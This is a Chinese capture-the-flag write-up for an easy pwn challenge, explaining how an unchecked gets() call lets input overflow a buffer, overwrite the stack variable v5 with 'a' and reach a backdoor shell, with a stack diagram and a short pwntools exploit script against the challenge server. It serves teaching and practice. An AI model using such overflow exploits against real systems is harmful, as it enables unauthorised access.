【PWN】HappyNewYearCTF_2_栈上变量覆写1

题目地址:https://ctf.cssec.cc/games/25/challenges

Author: Sonder

Difficulty: Easy

Category: 栈溢出


gets函数是C语言中的一个函数,用于读取一行文本。这个函数的问题在于,它不会检查输入的长度,所以如果输入的文本超过了目标缓冲区的大小,就会导致栈溢出

这是因为gets函数不知道你为字符串分配了多少内存,它会一直读取输入,直到遇到换行符或EOF。如果输入的数据超过了你分配的内存,gets就会把多余的数据写入其他内存区域,这就可能覆盖其他的变量或者程序的执行代码,导致程序崩溃或者其他未定义的行为

解题

首先checksec,可以看到保护全开,接下来IDA逆向看下。

通过IDA分析,可以发现,当v5=97时,会执行func(sh),我们进一步来看,可以发现实际func(sh)是一个后门函数,可以直接给到shell

接下来,分析一下溢出点,可以看到format是8个字节,但此时是通过gets进行输入,之前文章我们已经介绍过,gets是读取一行字符串到变量中,直到遇到换行停止。

故这里肯定存在溢出。那如何溢出到v5。我们进一步分析栈空间。

复制代码
  High
  Address |                 |
          +-----------------+  <-- rbp + 0x8
          | return address  |  (8字节,函数返回地址)
          +-----------------+  <-- rbp (栈基址寄存器)
          | old rbp         |  (8字节,调用者的栈基址)
          +-----------------+  <-- rbp - 0x8
          | canary value    |  (8字节,栈保护值)
          +-----------------+  <-- rbp - 0x10
          | v5 (__int64)    |  (8字节,局部变量)
          +-----------------+  <-- rbp - 0x18
          | format[8]       |  (8字节,可控的格式化字符串)
  Low     |                 |
  Address

通过栈空间,可以发现,本题中canary实际并无影响,只需通过format溢出到v5即可。

97是a的ASCII码,故我们只需要输入8个字符加一个a即可,在这里我输入9个a,可见下图溢出成功,获取管理权限

exp编写

截止目前,已经可以成功获取flag,但是本着学习的原则。我们仍需进一步编写exp。

py 复制代码
from pwn import *

# 设置日志级别debug,可以打印更多log
context.log_level = 'debug'
HOST = 'challenges.ctf.cssec.cc'
PORT = 32779

r = remote(HOST,PORT)

# 获取输出内容,
r.recvuntil('I will show it.')

exp = 'a'*9
# 发送exp
r.sendline(exp)
# 开始交互
r.interactive()
相关推荐
handler0112 小时前
Git 核心指令速查
linux·c语言·c++·笔记·git·学习
星幻元宇VR12 小时前
VR单人地震体验平台助力防灾减灾教育
科技·学习·安全·vr·虚拟现实
PNP机器人13 小时前
Kinova双臂柔顺控制新方案|牛津开源双域阻抗控制器精准装配 + 安全交互一键实现
安全·交互·kinova机械臂·技术论文
Gary Studio13 小时前
ubuntu 16.04一键换源
linux·运维·ubuntu
又来敲代码了13 小时前
k8s的部署
linux·运维·云原生·容器·kubernetes
梦·D·13 小时前
安全运维工具箱sskit_v1.0.3 部署
运维
CDN36013 小时前
DNS 负载均衡技术架构与调度策略解析
运维·架构·负载均衡
忡黑梨13 小时前
eNSP_路由策略
运维·服务器·网络·华为·智能路由器·负载均衡
IT WorryFree13 小时前
FGT-KVM 完整部署极简教程(CentOS 7 + KVM 环境)
linux·运维·centos